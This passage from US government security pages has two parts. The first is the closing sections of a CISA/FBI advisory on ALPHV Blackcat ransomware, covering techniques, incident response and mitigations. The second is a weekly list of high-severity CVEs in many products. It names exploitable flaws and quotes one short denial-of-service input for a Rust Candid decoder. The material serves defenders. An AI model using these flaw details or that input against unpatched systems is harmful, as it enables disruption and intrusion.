Technique Title ID Use

Obtain Credentials from Passwords Stores

T1555

ALPHV Blackcat affiliates obtain passwords from local networks, deleted servers, and domain controllers.

Adversary-in-the-Middle

T1557

ALPHV Blackcat/ALPHV affiliates use the open-source framework Evilginx2 to obtain MFA credentials, login credentials, and session cookies for targeted networks.

INCIDENT RESPONSE

If compromise is detected, organizations should:

  1. Quarantine or take offline potentially affected hosts.
  2. Reimage compromised hosts.
  3. Provision new account credentials.
  4. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
  5. Report the compromise or phishing incident to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). State, local, tribal, or territorial government entities can also report to MS-ISAC (SOC@cisecurity.org or 866-787-4722).
  6. To report spoofing or phishing attempts (or to report that you’ve been a victim), file a complaint with the FBI’s Internet Crime Complaint Center (IC3), or contact your local FBI Field Office to report an incident.

MITIGATIONS

These mitigations apply to all critical infrastructure organizations and network defenders. The FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques, thus, strengthening the security posture for their customers.

For more information on secure by design, see CISA’s Secure by Design webpage and joint guide.

FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on threat actor activity and to reduce the risk of compromise by ALPHV Blackcat threat actors. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Secure remote access tools by:
    • Implementing application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
    • Applying recommendations in CISA’s joint Guide to Securing Remote Access Software.
  • Implementing FIDO/WebAuthn authentication or Public key Infrastructure (PKI)-based MFA [CPG 2.H]. These MFA implementations are resistant to phishing and not susceptible to push bombing or SIM swap attacks, which are techniques known be used by ALPHV Blackcat affiliates. See CISA’s Fact Sheet Implementing Phishing-Resistant MFA for more information.
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
  • Implement user training on social engineering and phishing attacks [CPG 2.I]. Regularly educate users on identifying suspicious emails and links, not interacting with those suspicious items, and the importance of reporting instances of opening suspicious emails, links, attachments, or other potential lures.
  • Implement internal mail and messaging monitoring. Monitoring internal mail and messaging traffic to identify suspicious activity is essential as users may be phished from outside the targeted network or without the knowledge of the organizational security team. Establish a baseline of normal network traffic and scrutinize any deviations.
  • Implement free security tools to prevent cyber threat actors from redirecting users to malicious websites to steal their credentials. For more information see, CISA’s Free Cybersecurity Services and Tools webpage.
  • Install and maintain antivirus software. Antivirus software recognizes malware and protects your computer against it. Installing antivirus software from a reputable vendor is an important step in preventing and detecting infections. Always visit vendor sites directly rather than clicking on advertisements or email links. Because attackers are continually creating new viruses and other forms of malicious code, it is important to keep your antivirus software up to date.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 1-3).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.

VERSION HISTORY

December 19, 2023: Initial version.

Categories
alerts

Vulnerability Summary for the Week of December 11, 2023

 High Vulnerabilities

Primary
Vendor — Product		 Description Published CVSS Score Source & Patch Info
acronis — cyber_protect_home_office Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40901. 2023-12-12 7.8 CVE-2023-48677
security@acronis.com
adobe — after_effects Adobe After Effects versions 24.0.3 (and earlier) and 23.6.0 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48632
psirt@adobe.com
adobe — after_effects Adobe After Effects versions 24.0.3 (and earlier) and 23.6.0 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48633
psirt@adobe.com
adobe — after_effects Adobe After Effects versions 24.0.3 (and earlier) and 23.6.0 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48634
psirt@adobe.com
adobe — illustrator Adobe Illustrator versions 28.0 (and earlier) and 27.9 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-47063
psirt@adobe.com
adobe — illustrator Adobe Illustrator versions 28.0 (and earlier) and 27.9 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-47074
psirt@adobe.com
adobe — illustrator Adobe Illustrator versions 28.0 (and earlier) and 27.9 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-47075
psirt@adobe.com
adobe — substance_3d_designer Adobe Substance 3D Designer versions 13.0.0 (and earlier) and 13.1.0 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48639
psirt@adobe.com
adobe — substance_3d_sampler Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48625
psirt@adobe.com
adobe — substance_3d_sampler Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48626
psirt@adobe.com
adobe — substance_3d_sampler Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48627
psirt@adobe.com
adobe — substance_3d_sampler Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48628
psirt@adobe.com
adobe — substance_3d_sampler Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48629
psirt@adobe.com
adobe — substance_3d_sampler Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 7.8 CVE-2023-48630
psirt@adobe.com
advplyr — audiobookshelf Audiobookshelf is a self-hosted audiobook and podcast server. In versions 2.4.3 and prior, users with the update permission are able to read arbitrary files, delete arbitrary files and send a GET request to arbitrary URLs and read the response. This issue may lead to Information Disclosure. As of time of publication, no patches are available. 2023-12-13 8.1 CVE-2023-47619
security-advisories@github.com
security-advisories@github.com
advplyr — audiobookshelf Audiobookshelf is a self-hosted audiobook and podcast server. In versions 2.4.3 and prior, any user (regardless of their permissions) may be able to read files from the local file system due to a path traversal in the `/hls` endpoint. This issue may lead to Information Disclosure. As of time of publication, no patches are available. 2023-12-13 7.5 CVE-2023-47624
security-advisories@github.com
security-advisories@github.com
afichet — openexr_viewer OpenEXR-viewer is a viewer for OpenEXR files with detailed metadata probing. Versions prior to 0.6.1 have a memory overflow vulnerability. This issue is fixed in version 0.6.1. 2023-12-11 9.8 CVE-2023-50245
security-advisories@github.com
security-advisories@github.com
amttgroup — hibos A vulnerability, which was classified as critical, has been found in AMTT HiBOS 1.0. Affected by this issue is some unknown functionality. The manipulation of the argument Type leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247340. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-10 9.8 CVE-2023-6647
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
antonymale — synctrayzor SyncTrayzor 1.1.29 enables CEF (Chromium Embedded Framework) remote debugging, allowing a local attacker to control the application. 2023-12-09 7.8 CVE-2021-46899
cve@mitre.org
cve@mitre.org
apereo — opencast An issue was discovered in Apereo Opencast 4.x through 10.x before 10.6. It sends system digest credentials during authentication attempts to arbitrary external services in some situations. 2023-12-12 7.5 CVE-2018-16153
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
apple — ipados The issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.7.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1. Processing maliciously crafted input may lead to arbitrary code execution in user-installed apps. 2023-12-12 7.8 CVE-2023-40446
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 8.8 CVE-2023-42910
product-security@apple.com
product-security@apple.com
apple — macos The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.2. Processing an image may lead to arbitrary code execution. 2023-12-12 7.8 CVE-2023-42882
product-security@apple.com
product-security@apple.com
apple — macos An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2. A user may be able to cause unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42886
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42901
product-security@apple.com
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42902
product-security@apple.com
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42903
product-security@apple.com
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42904
product-security@apple.com
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42905
product-security@apple.com
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42906
product-security@apple.com
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42907
product-security@apple.com
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42908
product-security@apple.com
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42909
product-security@apple.com
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42911
product-security@apple.com
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42912
product-security@apple.com
product-security@apple.com
apple — macos Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. 2023-12-12 7.8 CVE-2023-42926
product-security@apple.com
product-security@apple.com
apple — multiple_products The issue was addressed with improved memory handling. This issue is fixed in Safari 17.2, macOS Sonoma 14.2, watchOS 10.2, iOS 17.2 and iPadOS 17.2, tvOS 17.2. Processing web content may lead to arbitrary code execution. 2023-12-12 8.8 CVE-2023-42890
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — multiple_products The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2, macOS Ventura 13.6.3, tvOS 17.2, iOS 16.7.3 and iPadOS 16.7.3, macOS Monterey 12.7.2. Processing an image may lead to arbitrary code execution. 2023-12-12 7.8 CVE-2023-42899
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
archerirm — archer Archer Platform 6.x before 6.14 P1 HF2 (6.14.0.1.2) contains an insecure direct object reference vulnerability. An authenticated malicious user in a multi-instance installation could potentially exploit this vulnerability by manipulating application resource references in user requests to bypass authorization checks, in order to gain execute access to AWF application resources. 2023-12-12 8.8 CVE-2023-48641
cve@mitre.org
armorx_global_technology_corporation — armorx_spam ArmorX Global Technology Corporation ArmorX Spam has insufficient validation for user input within a special function. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database. 2023-12-15 9.8 CVE-2023-48384
twcert@cert.org.tw
asterisk — asterisk Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the ‘update’ functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the ‘update’ functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa. 2023-12-14 7.5 CVE-2023-37457
security-advisories@github.com
security-advisories@github.com
asterisk — asterisk Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6. 2023-12-14 7.5 CVE-2023-49786
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
beyondtrust — privilege_management_for_mac An issue was discovered in BeyondTrust Privilege Management for Mac before 5.7. An authenticated, unprivileged user can elevate privileges by running a malicious script (that executes as root from a temporary directory) during install time. (This applies to macOS before 10.15.5, or Security Update 2020-003 on Mojave and High Sierra, Later versions of macOS are not vulnerable.) 2023-12-11 8.8 CVE-2021-3187
cve@mitre.org
cve@mitre.org
beyondtrust — privilege_management_for_windows An issue was discovered in BeyondTrust Privilege Management for Windows through 5.6. An attacker can spawn a process with multiple users as part of the security token (prior to Avecto elevation). When Avecto elevates the process, it removes the user who is launching the process, but not the second user. Therefore this second user still retains access and can give permission to the process back to the first user. 2023-12-11 8.8 CVE-2020-12613
cve@mitre.org
cve@mitre.org
beyondtrust — privilege_management_for_windows An issue was discovered in BeyondTrust Privilege Management for Windows through 5.6. When specifying a program to elevate, it can typically be found within the Program Files (x86) folder and therefore uses the %ProgramFiles(x86)% environment variable. However, when this same policy gets pushed to a 32bit machine, this environment variable does not exist. Therefore, since the standard user can create a user level environment variable, they can repoint this variable to any folder the user has full control of. Then, the folder structure can be created in such a way that a rule matches and arbitrary code runs elevated. 2023-12-12 7.8 CVE-2020-12612
cve@mitre.org
cve@mitre.org
beyondtrust — privilege_management_for_windows An issue was discovered in BeyondTrust Privilege Management for Windows through 5.6. If the publisher criteria is selected, it defines the name of a publisher that must be present in the certificate (and also requires that the certificate is valid). If an Add Admin token is protected by this criteria, it can be leveraged by a malicious actor to achieve Elevation of Privileges from standard user to administrator. 2023-12-12 7.8 CVE-2020-12614
cve@mitre.org
cve@mitre.org
beyondtrust — privilege_management_for_windows An issue was discovered in BeyondTrust Privilege Management for Windows through 5.6. When adding the Add Admin token to a process, and specifying that it runs at medium integrity with the user owning the process, this security token can be stolen and applied to arbitrary processes. 2023-12-12 7.8 CVE-2020-12615
cve@mitre.org
cve@mitre.org
beyondtrust — privilege_management_for_windows In BeyondTrust Privilege Management for Windows (aka PMfW) through 5.7, a SYSTEM installation causes Cryptbase.dll to be loaded from the user-writable location %WINDIR%Temp. 2023-12-12 7.8 CVE-2020-28369
cve@mitre.org
cve@mitre.org
campcodes — student_clearance_system A vulnerability, which was classified as critical, has been found in Campcodes Web-Based Student Clearance System 1.0. This issue affects some unknown processing of the file /libsystem/login.php. The manipulation of the argument student leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247367. 2023-12-11 7.5 CVE-2023-6659
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
checkmk_gmbh — checkmk Usage of user controlled LD_LIBRARY_PATH in agent in Checkmk 2.2.0p10 up to 2.2.0p16 allows malicious Checkmk site user to escalate rights via injection of malicious libraries 2023-12-13 8.8 CVE-2023-31210
security@checkmk.com
code-projects — matrimonial_site A vulnerability was found in code-projects Matrimonial Site 1.0. It has been classified as critical. Affected is an unknown function of the file /auth/auth.php?user=1. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247344. 2023-12-10 9.8 CVE-2023-6651
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — matrimonial_site A vulnerability was found in code-projects Matrimonial Site 1.0. It has been declared as critical. Affected by this vulnerability is the function register of the file /register.php. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247345 was assigned to this vulnerability. 2023-12-10 9.8 CVE-2023-6652
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
collaboraoffice — richdocumentscode Collabora Online is a collaborative online office suite based on LibreOffice technology. Unlike a standalone dedicated Collabora Online server, the Built-in CODE Server (richdocumentscode) is run without chroot sandboxing. Vulnerable versions of the richdocumentscode app can be susceptible to attack via modified client->server commands to overwrite files outside the sub directory the server has provided for the transient session. Files which can be accessed are limited to those that the server process has access to. The bug was fixed in Collabora Online – Built-in CODE Server (richdocumentscode) release 23.5.602. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-12-08 7.2 CVE-2023-49788
security-advisories@github.com
crocoblock — jetblocks_for_elementor Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Crocoblock JetBlocks For Elementor allows Reflected XSS.This issue affects JetBlocks For Elementor: from n/a through 1.3.8. 2023-12-14 7.1 CVE-2023-48756
audit@patchstack.com
dasan_networks — dasan_networks Dasan Networks – W-Web versions 1.22-1.27 – CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) 2023-12-13 9.8 CVE-2023-42495
cna@cyber.gov.il
dedebiz — dedebiz A vulnerability was found in DedeBIZ 6.2 and classified as critical. This issue affects some unknown processing of the file /src/admin/content_batchup_action.php. The manipulation of the argument endid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247883. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-13 7.2 CVE-2023-6755
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
dell — _vapp_manger Dell vApp Manger, versions prior to 9.2.4.x contain an arbitrary file read vulnerability. A remote attacker could potentially exploit this vulnerability to read arbitrary files from the target system. 2023-12-14 7.5 CVE-2023-48660
security_alert@emc.com
dell — _vapp_manger Dell vApp Manager, versions prior to 9.2.4.x contain a command injection vulnerability. A remote malicious user with high privileges could potentially exploit this vulnerability leading to the execution of arbitrary OS commands on the affected system. 2023-12-14 7.2 CVE-2023-48662
security_alert@emc.com
dell — _vapp_manger Dell vApp Manager, versions prior to 9.2.4.x contain a command injection vulnerability. A remote malicious user with high privileges could potentially exploit this vulnerability leading to the execution of arbitrary OS commands on the affected system. 2023-12-14 7.2 CVE-2023-48663
security_alert@emc.com
dell — _vapp_manger Dell vApp Manager, versions prior to 9.2.4.x contain a command injection vulnerability. A remote malicious user with high privileges could potentially exploit this vulnerability leading to the execution of arbitrary OS commands on the affected system. 2023-12-14 7.2 CVE-2023-48664
security_alert@emc.com
dell — _vapp_manger Dell vApp Manager, versions prior to 9.2.4.x contain a command injection vulnerability. A remote malicious user with high privileges could potentially exploit this vulnerability leading to the execution of arbitrary OS commands on the affected system. 2023-12-14 7.2 CVE-2023-48665
security_alert@emc.com
dell — _vapp_manger Dell vApp Manager, versions prior to 9.2.4.x contain an information disclosure vulnerability. A remote attacker could potentially exploit this vulnerability leading to obtain sensitive information that may aid in further attacks. 2023-12-14 7.5 CVE-2023-48671
security_alert@emc.com
dell — poweredge_r660_firmware Dell PowerEdge BIOS contains an improper privilege management security vulnerability. An unauthenticated local attacker could potentially exploit this vulnerability, leading to privilege escalation. 2023-12-08 7.8 CVE-2023-32460
security_alert@emc.com
dell — powerprotect_dd Dell PowerProtect DD , versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain a DOM-based Cross-Site Scripting vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to the injection of malicious HTML or JavaScript code to a victim user’s DOM environment in the browser. . Exploitation may lead to information disclosure, session theft, or client-side request forgery. 2023-12-14 8.8 CVE-2023-44286
security_alert@emc.com
dell — powerprotect_dd Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 on DDMC contain an OS command injection vulnerability in an admin operation. A local high privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the managed system application’s underlying OS with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker on a managed system of DDMC. 2023-12-14 8.2 CVE-2023-48668
security_alert@emc.com
dell — powerprotect_dd Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an OS command injection vulnerability in the CLI. A local low privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application’s underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker. 2023-12-14 7.8 CVE-2023-44277
security_alert@emc.com
dell — powerprotect_dd Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an improper access control vulnerability. A local malicious user with low privileges could potentially exploit this vulnerability leading to escalation of privilege. 2023-12-14 7.8 CVE-2023-44285
security_alert@emc.com
dell — powerprotect_dd Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an OS command injection vulnerability in administrator CLI. A remote high privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application’s underlying OS to bypass security restriction. Exploitation may lead to a system take over by an attacker. 2023-12-14 7.2 CVE-2023-48667
security_alert@emc.com
devolutions — remote_desktop_manager Client side permission bypass in Devolutions Remote Desktop Manager 2023.3.4.0 and earlier on iOS allows an attacker that has access to the application to execute entries in a SQL data source without restriction. 2023-12-12 9.8 CVE-2023-6593
security@devolutions.net
dfinity — candid The Candid library causes a Denial of Service while parsing a specially crafted payload with ’empty’ data type. For example, if the payload is `record { * ; empty }` and the canister interface expects `record { * }` then the Rust candid decoder treats empty as an extra field required by the type. The problem with the type empty is that the candid Rust library wrongly categorizes empty as a recoverable error when skipping the field and thus causing an infinite decoding loop. Canisters using affected versions of candid are exposed to denial of service by causing the decoding to run indefinitely until the canister traps due to reaching maximum instruction limit per execution round. Repeated exposure to the payload will result in degraded performance of the canister. Note: Canisters written in Motoko are unaffected. 2023-12-08 7.5 CVE-2023-6245
6b35d637-e00f-4228-858c-b20ad6e1d07b
6b35d637-e00f-4228-858c-b20ad6e1d07b
6b35d637-e00f-4228-858c-b20ad6e1d07b
6b35d637-e00f-4228-858c-b20ad6e1d07b
6b35d637-e00f-4228-858c-b20ad6e1d07b
dockge.kuma — dockge Uptime Kuma is an easy-to-use self-hosted monitoring tool. Prior to version 1.23.9, the application uses WebSocket (with Socket.io), but it does not verify that the source of communication is valid. This allows third-party website to access the application on behalf of their client. When connecting to the server using Socket.IO, the server does not validate the `Origin` header leading to other site being able to open connections to the server and communicate with it. Other websites still need to authenticate to access most features, however this can be used to circumvent firewall protections made in place by people deploying the application. Without origin validation, Javascript executed from another origin would be allowed to connect to the application without any user interaction. Without login credentials, such a connection is unable to access protected endpoints containing sensitive data of the application. However, such a connection may allow attacker to further exploit unseen vulnerabilities of the application. Users with “No-auth” mode configured who are relying on a reverse proxy or firewall to provide protection to the application would be especially vulnerable as it would grant the attacker full access to the application. In version 1.23.9, additional verification of the HTTP Origin header has been added to the socket.io connection handler. By default, if the `Origin` header is present, it would be checked against the Host header. Connection would be denied if the hostnames do not match, which would indicate that the request is cross-origin. Connection would be allowed if the `Origin` header is not present. Users can override this behavior by setting environment variable `UPTIME_KUMA_WS_ORIGIN_CHECK=bypass`. 2023-12-11 8.8 CVE-2023-49805
security-advisories@github.com
security-advisories@github.com
dockge.kuma — dockge Uptime Kuma is an easy-to-use self-hosted monitoring tool. Prior to version 1.23.9, when a user changes their login password in Uptime Kuma, a previously logged-in user retains access without being logged out. This behavior persists consistently, even after system restarts or browser restarts. This vulnerability allows unauthorized access to user accounts, compromising the security of sensitive information. The same vulnerability was partially fixed in CVE-2023-44400, but logging existing users out of their accounts was forgotten. To mitigate the risks associated with this vulnerability, the maintainers made the server emit a `refresh` event (clients handle this by reloading) and then disconnecting all clients except the one initiating the password change. It is recommended to update Uptime Kuma to version 1.23.9. 2023-12-11 7.8 CVE-2023-49804
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
dompdf — php-svg-lib php-svg-lib is an SVG file parsing / rendering library. Prior to version 0.5.1, when handling `` tag that references an `` tag, it merges the attributes from the `` tag to the `` tag. The problem pops up especially when the `href` attribute from the `` tag has not been sanitized. This can lead to an unsafe file read that can cause PHAR Deserialization vulnerability in PHP prior to version 8. Version 0.5.1 contains a patch for this issue. 2023-12-12 9.8 CVE-2023-50252
security-advisories@github.com
security-advisories@github.com
dompdf — php-svg-lib php-svg-lib is an SVG file parsing / rendering library. Prior to version 0.5.1, when parsing the attributes passed to a `use` tag inside an svg document, an attacker can cause the system to go to an infinite recursion. Depending on the system configuration and attack pattern this could exhaust the memory available to the executing process and/or to the server itself. An attacker sending multiple request to a system to render the above payload can potentially cause resource exhaustion to the point that the system is unable to handle incoming request. Version 0.5.1 contains a patch for this issue. 2023-12-12 7.5 CVE-2023-50251
security-advisories@github.com
security-advisories@github.com
draytek — vigor167_firmware An OS Command Injection in the CLI interface on DrayTek Vigor167 version 5.2.2, allows remote attackers to execute arbitrary system commands and escalate privileges via any account created within the web interface. 2023-12-09 9.8 CVE-2023-47254
cve@mitre.org
